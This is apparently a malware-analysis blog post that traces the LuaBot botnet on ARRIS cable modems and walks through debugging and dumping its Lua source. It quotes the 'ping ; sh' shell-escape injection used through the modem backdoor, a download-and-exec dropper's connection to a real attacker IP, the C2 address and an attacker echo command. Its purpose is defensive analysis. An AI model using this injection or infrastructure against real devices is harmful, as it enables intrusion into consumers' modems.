<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaIq4OARW2tVlwtPRpTWCR_3_hrIXxx-o8nYxyjnt9T-gjJV-znnc2Nd6GSkgnBwTKjca-xUpNgq5gr3OaBYogLtyryHRf6M70eWTvchvFEeHJulnEPqCiou6YqVsi2W9dMhQ2KqlUfCV9/s1600/myths.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaIq4OARW2tVlwtPRpTWCR_3_hrIXxx-o8nYxyjnt9T-gjJV-znnc2Nd6GSkgnBwTKjca-xUpNgq5gr3OaBYogLtyryHRf6M70eWTvchvFEeHJulnEPqCiou6YqVsi2W9dMhQ2KqlUfCV9/s320/myths.PNG" width="320" /></span></a></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">I received some reports that malware creators are remotely exploiting those devices in order to dump the modem's configuration and steal private certificates. Some users also reported that those certificates are being sold for bitcoin to modem cloners all around the world. The report from <a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">Malware Must Die!</a> also points that the LuaBot is being used for flooding/DDoS attacks.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<b><span style="font-family: inherit;">Exploit and Initial Infection</span></b></div>
<div>
<b><span style="font-family: inherit;"><br /></span></b></div>
<div>
<span style="font-family: inherit;">Luabot malware is part of a bigger botnet targeting embedded devices from multiple architectures. After verifying some infected systems, I noticed that most cable modems were compromised by a command injection in the restricted CLI accessible via the ARRIS Password of The Day Backdoor.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">Telnet honeypots like the one from <a href="http://www.nothink.org/honeypot_telnet.php">nothink.org</a> have been logging these exploit attempts for some time. </span>They are logging many attempts to bruteforce the username "system" and the password "ping ; sh", but they're, in fact, commands used to escape from the restricted ARRIS telnet shell.</div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtm9_9yfXT1OjyBORsggxAkSQ7H9mHvrlmUt8JBwf7icMNvEXV7KRIuXTETzWRa7SLtg944n2cNNp-Tf5MT81SkIndHF2bOZ2P1zBDJ747Syk3V8jFGdxsnc66YiFQLwsJX9Os6hTISddp/s1600/top-honeypot.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtm9_9yfXT1OjyBORsggxAkSQ7H9mHvrlmUt8JBwf7icMNvEXV7KRIuXTETzWRa7SLtg944n2cNNp-Tf5MT81SkIndHF2bOZ2P1zBDJ747Syk3V8jFGdxsnc66YiFQLwsJX9Os6hTISddp/s320/top-honeypot.PNG" width="294" /></span></a></div>
<div>
<br /></div>
<div>
<span style="font-family: inherit;">The initial dropper is created by echoing shell commands to the terminal to create a standard ARM ELF.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBGGGVAOdXe9DgThOPc2YYzCWyJkmX5sfO8KT2JcSY1LY44Vd2rUmAzFrWWsUZCX4-K5Ab4qmf-QHDsI2ouyI554wQM3wNlxepswwlh7d1muuQHIz5GI4ZmqgLnDxmahgjh5RBMfUZ3WVN/s1600/dropper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBGGGVAOdXe9DgThOPc2YYzCWyJkmX5sfO8KT2JcSY1LY44Vd2rUmAzFrWWsUZCX4-K5Ab4qmf-QHDsI2ouyI554wQM3wNlxepswwlh7d1muuQHIz5GI4ZmqgLnDxmahgjh5RBMfUZ3WVN/s640/dropper.png" width="640" /></span></a></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">I have cross compiled and uploaded a few debugging tools to my <a href="https://github.com/bmaia/cross-utils/tree/master/armeb">cross-utils</a> repository, including <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/gdb">gdbserver</a>, <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/strace">strace</a> and <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/tcpdump">tcpdump</a>. I also happen to have a vulnerable ARRIS TG862 so I can perform dynamic analysis in a controlled environment.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">If you run the dropper using strace to monitor the network syscalls, you can see the initial connection attempt:</span>
<span style="font-family: inherit;"><br /></span>
<br />
<div class="code">
./strace -v -s 9999 -e poll,select,connect,recvfrom,sendto -o network.txt ./mw/drop</div>
<div class="code">
connect(6, {sa_family=AF_INET, sin_port=htons(4446), sin_addr=inet_addr("46.148.18.122")}, 16) = -1 ENODEV (No such device)
</div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The command is a simple download and exec ARMEB shellcode. The malicious IP 46.148.18.122 is known for </span><a href="https://www.abuseipdb.com/check/46.148.18.122" style="font-family: inherit;">bruteforcing SSH servers and trying to exploit Linksys router command injections</a><span style="font-family: inherit;"> in the wild. After downloading the second stage malware, the script will echo the following string:</span><br />
<div class="code">
echo -e 61\\\\\\x30ck3r
</div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">This pattern is particularly interesting because it is quite similar to the one reported by ProtectWise while </span><a href="https://www.protectwise.com/blog/observing-large-scale-router-exploit-attempts/" style="font-family: inherit;">Observing Large-Scale Router Exploit Attempts</a><span style="font-family: inherit;">:</span><br />
<div class="code">
cmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt
</div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The second stage binary ".nttpd" (MD5 c867d00e4ed65a4ae91ee65ee00271c7) performs some internal checks and creates iptables rules </span>allowing remote access from very specific subnets and <span style="font-family: inherit;">blocking external access to ports 8080, 80, 433, 23 and 22:</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5JwQtBVsc61lXDfLLjPNgQ3lVuqQKF2Hw7Gp1oc8njaOqoPZ2DwD7L93nqgP7z3QWQu3P9eQslq0u59P_dhdYmdyNqhovdkpyM75A9xTiDjwDYka36dS5uuJ3-bdyCVmw0f6H9IKmpwgh/s1600/iptables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5JwQtBVsc61lXDfLLjPNgQ3lVuqQKF2Hw7Gp1oc8njaOqoPZ2DwD7L93nqgP7z3QWQu3P9eQslq0u59P_dhdYmdyNqhovdkpyM75A9xTiDjwDYka36dS5uuJ3-bdyCVmw0f6H9IKmpwgh/s640/iptables.png" width="640" /></a></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">These rules block external exploit attempts to ARRIS services/backdoors, restricting access to networks controlled by the attacker.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">After setting up the rules, two additional binaries were transferred/started by the attacker. The first one, .sox.rslv (</span>889100a188a42369fd93e7010f7c654b) is a simple DNS query tool based on <a href="https://github.com/wongsyrone/shadowsocks-libev-libsodium-for-server/tree/master/libudns">udns 0.4</a>.</div>
<div>
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig64C0EeT_cKSqkLo7_sAa_s6Iz5DUjBxJLNt829JdlL6y0CeqjiLlE-8ZhyKG5YbHXd_Slg0TDAgcpnnjfKpzG1miKXSw6A2wIRn2vBu8VBJQOUrLnGMO04oLu5w_u9f0PKnYE7WHss8m/s1600/udns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig64C0EeT_cKSqkLo7_sAa_s6Iz5DUjBxJLNt829JdlL6y0CeqjiLlE-8ZhyKG5YbHXd_Slg0TDAgcpnnjfKpzG1miKXSw6A2wIRn2vBu8VBJQOUrLnGMO04oLu5w_u9f0PKnYE7WHss8m/s400/udns.png" width="400" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The other binary, .sox (</span>4b8c0ec8b36c6bf679b3afcc6f54442a), sets the device's DNS servers to 8.8.8.8 and 8.8.4.4 and provides multiple tunneling functionalities including SOCKS/proxy, DNS and IPv6.</div>
<div>
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo1CE2YiKaOym9V2HOHr5bAflz8R13j4jaZTL8cvrS7A096-s48JzI5Q7HUF2iJv8QMn9VXLuMSmgNBkDSvgUeWV8QAxFBbEj9nkFm6NMTSiETfT7h5upX9pRg3pe7Y6UYGUYOxpVOqLhC/s1600/dns2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo1CE2YiKaOym9V2HOHr5bAflz8R13j4jaZTL8cvrS7A096-s48JzI5Q7HUF2iJv8QMn9VXLuMSmgNBkDSvgUeWV8QAxFBbEj9nkFm6NMTSiETfT7h5upX9pRg3pe7Y6UYGUYOxpVOqLhC/s640/dns2.PNG" width="640" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Parts of the code resembles some <a href="http://code.taobao.org/p/sss-libev/src/trunk/shadowsocks-libev-master/">shadowsocks-libev</a> functionalities and there's an interesting reference to the <a href="https://www.threatcrowd.org/domain.php?domain=whrq.net">whrq[.]net domain</a>, which seems to be used as a dnscrypt gateway:</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEL7AZHGv6tmYxhz_zodYRRkB9-41uOweQTHw2FAyb-2DfSiTz9NCYahEv0iYOeWpZNWG6A19s4RrFh6d8C47ZbR_Q9yiDyLBVq29uumbL2-FgGRLvYhUxFBoeC7D3KI71iCnKO1V4bG7G/s1600/whrq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEL7AZHGv6tmYxhz_zodYRRkB9-41uOweQTHw2FAyb-2DfSiTz9NCYahEv0iYOeWpZNWG6A19s4RrFh6d8C47ZbR_Q9yiDyLBVq29uumbL2-FgGRLvYhUxFBoeC7D3KI71iCnKO1V4bG7G/s400/whrq.png" width="400" /></a></div>
<br />
<strike>
All these binaries are used as auxiliary tools</strike> for the LuaBot's final stage, arm_puma5 (061b03f8911c41ad18f417223840bce0), which seems to be selectively installed on vulnerable cable modems.<br />
<br />
<span style="font-family: inherit;"><b>UPDATE: </b>According to <a href="https://medium.com/@x0rz/interview-with-the-luabot-malware-author-731b0646fc8f">this interview</a> with the supposed malware author, "<i>reversers usually get it wrong and say there’s some modules for my bot, but those actually are other bots, some routers are infected with several bots at once. My bot never had any binary modules and always is one big elf file and sometimes only small <1kb size dropper</i></span>"<br />
<div>
<br /></div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-family: inherit;">Final Stage: LuaBot</span></b><br />
<b><span style="font-family: inherit;"><br /></span></b>
The malware's final stage is a 716KB ARMEB ELF binary, statically linked, stripped and compiled using the same Puma5 toolchain as the one I made available on my <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/puma5_toolchain">cross-utils</a> repository.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyB-jqYSSacxCbQWgEiN4LCUwpIr5yuttlrIkzMJZ1ViqVrLsBBRtRezxLFEKltrty_y3ZSVU654FuCbYbQFY4_5K_5H69vfVJERXr5CUH1PT5URq-3K3EKLOe28payMXPwy-FpqDYYmVF/s1600/comment.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyB-jqYSSacxCbQWgEiN4LCUwpIr5yuttlrIkzMJZ1ViqVrLsBBRtRezxLFEKltrty_y3ZSVU654FuCbYbQFY4_5K_5H69vfVJERXr5CUH1PT5URq-3K3EKLOe28payMXPwy-FpqDYYmVF/s400/comment.png" width="400" /></a></div>
<br />
If we use strace to perform a dynamic analysis we can see the greetings from the bot's author and the creation of a mutex (bbot_mutex_202613). Then the bot will start listening on port 11833 (TCP) and will try to contact the command and control server at 80.87.205.92.</div>
<div>
<br />
<script src="https://gist.github.com/bmaia/a3f976bb608d1212d9b955f46fe85014.js"></script>
<br />
In order to understand how the malware works, let's mix some manual and dynamic analysis. Time to analyse the binary using IDA Pro and...<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrYdcxYByVavYaAWBkXMmipO8xMmzypNol-IB4C6CRJmmceMMAQI3wFXWCEWVmgf_Q9mZzoeCpX5Ghli2MjGudIqXufn5xsGflonhZ7_0a_sUdpG-8I6NgEl44lMosITlEb-QFOc_lUzXZ/s1600/confused-ida.gif" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrYdcxYByVavYaAWBkXMmipO8xMmzypNol-IB4C6CRJmmceMMAQI3wFXWCEWVmgf_Q9mZzoeCpX5Ghli2MjGudIqXufn5xsGflonhZ7_0a_sUdpG-8I6NgEl44lMosITlEb-QFOc_lUzXZ/s400/confused-ida.gif" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Reversing stripped binaries<br />
<br /></td></tr>
</tbody></table>
The binaries are stripped and IDA Pro's F.L.I.R.T. didn't recognize standard function calls for our ARMEB binary. Instead of spending hours manually reviewing the code, we can use <a href="https://github.com/joxeankoret/diaphora">@matalaz</a>'s <a href="https://github.com/joxeankoret/diaphora">diaphora</a> diffing plugin to port all the symbols.<br />
<br />
First, we need to export the symbols from uClibC's Puma5 toolchain. Download the prebuilt toolchain <a href="https://github.com/bmaia/cross-utils/blob/master/armeb/puma5_toolchain/armeb-linux.tar.xz">here</a> and open the library "armeb-linux\ti-puma5\lib\libuClibc-0.9.29.so" using IDA Pro. Choose File/Script File (Alt+F7), load diaphora.py, select a location to Export IDA Database to SQLite, mark "Export only non-IDA generated functions" and hit OK.<br />
<br />
When it finishes, close the current IDA database and open the binary arm_puma5. Rerun the diaphora.py script and now choose a SQLite database to diff against:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0O6rOaWHD4ixNP7evyIZsQjGhk1-WLi_9PmDU1lkOly88jfWJITM9aqzuO6q95cwskhKpX8jqLb9LTeSjhAkeuVvoeL_sBa8b-e1eR4BlieDSNG55xwl3PCOGw2gTj48EhjZ5mWfCcVnV/s1600/diaphora1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0O6rOaWHD4ixNP7evyIZsQjGhk1-WLi_9PmDU1lkOly88jfWJITM9aqzuO6q95cwskhKpX8jqLb9LTeSjhAkeuVvoeL_sBa8b-e1eR4BlieDSNG55xwl3PCOGw2gTj48EhjZ5mWfCcVnV/s400/diaphora1.png" width="400" /></a></div>
<br />
After a while, it will show various tabs with all the unmatched functions in both databases, as well as the "Best", "Partial" and "Unreliable" matches tabs.<br />
<br />
Browse the "Best matches" tab, right click on the list and select "Import *all* functions" and choose not to relaunch the diffing process when it finishes. Now head to the "Partial matches" tab, delete everything with a low ratio (I removed everything below 0.8), right click in the list and select "Import all data for sub_* function":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIKdtU0j02vFQwXg_tF_LxwRJv61tBLTaeZ8gOz1Duad3n4JWn9jQSTajqIsuGsulIjIQY1qMpkr1HaZArexr-vA-29uDOxBY4Oub6WA6YCP9GEN9GSApfaNTW7brE7dHT6xnFLJI9ELx6/s1600/diaphora-partialmatches.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIKdtU0j02vFQwXg_tF_LxwRJv61tBLTaeZ8gOz1Duad3n4JWn9jQSTajqIsuGsulIjIQY1qMpkr1HaZArexr-vA-29uDOxBY4Oub6WA6YCP9GEN9GSApfaNTW7brE7dHT6xnFLJI9ELx6/s400/diaphora-partialmatches.png" width="400" /></a></div>
<br />
The IDA strings window display lots of information related to the Lua scripting language. For this reason, I also <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/lua">cross-compiled Lua to ARMEB</a>, loaded the "lua" binary into IDA Pro and repeated the diffing process with <a href="https://github.com/joxeankoret/diaphora">diaphora</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIfjBoSnI0Z9uRahq63UIZ_Fl5ohLJypxgEl6cy_0CVGruH6PXboQk3twh68kwhOgQMleVhn0eljJmuZFZ0fJpOblgvHoDUO00JxqLXHl9hCEoGOoUC8CgQYS8gRPyecoyN-Zl0fSWw2D2/s1600/strings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIfjBoSnI0Z9uRahq63UIZ_Fl5ohLJypxgEl6cy_0CVGruH6PXboQk3twh68kwhOgQMleVhn0eljJmuZFZ0fJpOblgvHoDUO00JxqLXHl9hCEoGOoUC8CgQYS8gRPyecoyN-Zl0fSWw2D2/s640/strings.png" width="640" /></a></div>
<br />
We're almost done now. If you google for some debug messages present on the code, you can find a deleted Pastebin that was cached by Google.<br />
<span style="text-align: center;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpFaNRDcdl_QVRmAxGcyov5kfHFNIY5JP7GaMszO2tC9qLs8WGAdOY71_rwunyVMrEYBJz2NlCcNfnqmEArS0yQNgHB7vG_Lb72EFZk37a6doS6DHldvUtEEZidw25aU3chF_yPrwJwCH/s1600/pastebin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="579" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpFaNRDcdl_QVRmAxGcyov5kfHFNIY5JP7GaMszO2tC9qLs8WGAdOY71_rwunyVMrEYBJz2NlCcNfnqmEArS0yQNgHB7vG_Lb72EFZk37a6doS6DHldvUtEEZidw25aU3chF_yPrwJwCH/s640/pastebin.png" width="640" /></a></div>
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">I downloaded the C code (evsocketlib.c), created some dummy structs for everything that wasn't included there and cross-compiled it to ARMEB too. And now what? Diffing again =)</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaKPwhm8H6K-0aSgjY0oiRmyswIvbpsJBosUDV9aJhoEtLDdhl2FZYol2KhCHXwig9jpQT1gExZ5q927hV2_QTwoSopTaZjBl4S3tfRunIzUT5FLD7e_gpXbF-Xr60zf6-NgB2RaVHEkah/s1600/evs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaKPwhm8H6K-0aSgjY0oiRmyswIvbpsJBosUDV9aJhoEtLDdhl2FZYol2KhCHXwig9jpQT1gExZ5q927hV2_QTwoSopTaZjBl4S3tfRunIzUT5FLD7e_gpXbF-Xr60zf6-NgB2RaVHEkah/s400/evs.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPJGfnbHneitDeGp4OLp_ho3pOL9hKNnpo96-OFXKPl8TsGSaQzrdl0XJ9UaI02-EL6ZS-xv7ezu-K_qdhiYfmTFv9qBAi_6CriTNdQQtKU4d5EG_arsHKucguC3KVijoh4Z_TxzX2At5/s1600/evs-compile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="438" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBPJGfnbHneitDeGp4OLp_ho3pOL9hKNnpo96-OFXKPl8TsGSaQzrdl0XJ9UaI02-EL6ZS-xv7ezu-K_qdhiYfmTFv9qBAi_6CriTNdQQtKU4d5EG_arsHKucguC3KVijoh4Z_TxzX2At5/s640/evs-compile.png" width="640" /></a></div>
<br />
Reversing the malware is way more legible now. There's builtin Lua interpreter and some native code related to event sockets. The list of the botnet commands is stored at 0x8274: bot_daemonize, rsa_verify, sha1, fork, exec, wait_pid, pipe, evsocket, ed25519, dnsparser, struct, lpeg, evserver, evtimer and lfs:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUB79jIiEfNG-edegNGQrkwxRaC4OoKW99vsWvdWbjdlsrQ4LxBMJYwn8mN-yZTaeA8Rkyw5igd_nvRzxHEiNs_GX_JDYIP8cbThgpL_n72kPsFXMH1VU1yH40WO82RaElAU8zKVd44J-Z/s1600/botnet_commands.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUB79jIiEfNG-edegNGQrkwxRaC4OoKW99vsWvdWbjdlsrQ4LxBMJYwn8mN-yZTaeA8Rkyw5igd_nvRzxHEiNs_GX_JDYIP8cbThgpL_n72kPsFXMH1VU1yH40WO82RaElAU8zKVd44J-Z/s400/botnet_commands.png" width="181" /></a></div>
<br />
The bot starts by setting up the Lua environment, unpacks the code and then forks, waiting for instructions from the Command and Control server. The malware author packed the lua source code as a GZIP blob, making the entire reversing job easier for us, as we don't have to deal with Lua Bytecode.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPa5Wn_Bo0gb8HYmB37_z4RZofAt4NMWZRTOQKkVL77BRWbCWdaP14yL5S9R790iHZJQWRweSt7VsuzQYGSVOKztNOLntUlm-_zpDrwDRx-4AdfskBabNDxJu7rT1OsY3GYLM32a2Dn_Zo/s1600/gz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPa5Wn_Bo0gb8HYmB37_z4RZofAt4NMWZRTOQKkVL77BRWbCWdaP14yL5S9R790iHZJQWRweSt7VsuzQYGSVOKztNOLntUlm-_zpDrwDRx-4AdfskBabNDxJu7rT1OsY3GYLM32a2Dn_Zo/s640/gz.png" width="640" /></a></div>
<br />
The blob at 0xA40B8 contains a standard GZ header with the last modified timestamp from 2016-04-18 17:35:34:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW30Yf_xwbtpj8ezdIqmpq0jKmaG9SQH3BEWyIzIlgdHmRkhdEjhDJ9YbfZokulLr0yeM-TUWiszW17RdGw1E8E_rAJf1xrqbrK6p_1G4BYw2t8wWB77lPqiIdUNmQ0qGbigjJ7ObXObff/s1600/gz_header.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW30Yf_xwbtpj8ezdIqmpq0jKmaG9SQH3BEWyIzIlgdHmRkhdEjhDJ9YbfZokulLr0yeM-TUWiszW17RdGw1E8E_rAJf1xrqbrK6p_1G4BYw2t8wWB77lPqiIdUNmQ0qGbigjJ7ObXObff/s640/gz_header.png" width="640" /></a></div>
<br />
Another easy way to unpack the lua code is to attach the binary to your favorite debugger (<a href="https://github.com/hugsy/gef">gef</a>, of course) and dump the process memory (heap).<br />
<br />
First, copy <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/gdb">gdbserver</a> to the cable modem, run the malware (arm_puma5) and attach the debugger to the corresponding PID:<br />
<div class="code">
./gdbserver --multi localhost:12345 --attach 1058
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQEWiLlsNFeW_5yFvxGVoHjxUJ56-tb-v0crmzf_LccYeNsKuhtS4wWt05_MHEIDKJGENXP6-CRQ6Qlmi3wXecVb6nDAEreb95_Mt692iGmazfvwjWldmJ-FmfTw73pnQG85mSsn5DJji4/s1600/gef1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQEWiLlsNFeW_5yFvxGVoHjxUJ56-tb-v0crmzf_LccYeNsKuhtS4wWt05_MHEIDKJGENXP6-CRQ6Qlmi3wXecVb6nDAEreb95_Mt692iGmazfvwjWldmJ-FmfTw73pnQG85mSsn5DJji4/s400/gef1.png" width="400" /></a></div>
<br />
Then, start gef/GDB and attach it to the running server:<br />
<div class="code">
gdb-multiarch -q<br />
set architecture arm<br />
set endian big<br />
set follow-fork-mode child<br />
gef-remote 192.168.100.1:12345</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTmeb2RWKNvFZqFf3MH_QmIMviLR9FrcmOtk0tqbt19X1uRNkiw4NvUu1UoKf2tDppAWcL2RiI20ApqiAWef7vKIdrkLkaS0WMgTh7UeTjPEzpTahPm8hpHdEi-HYfrq_pDGc191UFoLnP/s1600/gef2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTmeb2RWKNvFZqFf3MH_QmIMviLR9FrcmOtk0tqbt19X1uRNkiw4NvUu1UoKf2tDppAWcL2RiI20ApqiAWef7vKIdrkLkaS0WMgTh7UeTjPEzpTahPm8hpHdEi-HYfrq_pDGc191UFoLnP/s400/gef2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Lastly, list the memory regions and dump the heap:<br />
<div class="code">
vmmap<br />
dump memory arm_puma5-heap.mem 0x000c3000 0x000df000
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDWogfyz3_F1G1IkbMRAJrob7gRlQRrFjKdhWb_Jy1ELID5bxgH0pVM-v7l3f0I-AonrCChhv68UHSiR0XP0DRtUTOgvv0AE_tDS3XbCMQ8d3xXfE-hgrKBp-bblXB2gzmAhA_vQTK00gy/s1600/gef-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDWogfyz3_F1G1IkbMRAJrob7gRlQRrFjKdhWb_Jy1ELID5bxgH0pVM-v7l3f0I-AonrCChhv68UHSiR0XP0DRtUTOgvv0AE_tDS3XbCMQ8d3xXfE-hgrKBp-bblXB2gzmAhA_vQTK00gy/s400/gef-3.png" width="400" /></a></div>
<div>
<br /></div>
<div>
That's it, now you have the full source code from the LuaBot:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh17QD2ovMPEeSF1USj2eAHTBy7kQMwbmvydb0bmCKdFMVU13hCb4rMHiV3mfRbu3Ucosa3CYQXg1qINCMCL9bW2rMjwluIdhaPZ4gkbz0RDxVLM78xzrSCt-Y8F1pIOsaZVomudv0PhRRd/s1600/gef-hex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh17QD2ovMPEeSF1USj2eAHTBy7kQMwbmvydb0bmCKdFMVU13hCb4rMHiV3mfRbu3Ucosa3CYQXg1qINCMCL9bW2rMjwluIdhaPZ4gkbz0RDxVLM78xzrSCt-Y8F1pIOsaZVomudv0PhRRd/s640/gef-hex.png" width="640" /></a></div>
<div>
<br /></div>
The LuaBot source code is composed of several modules:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
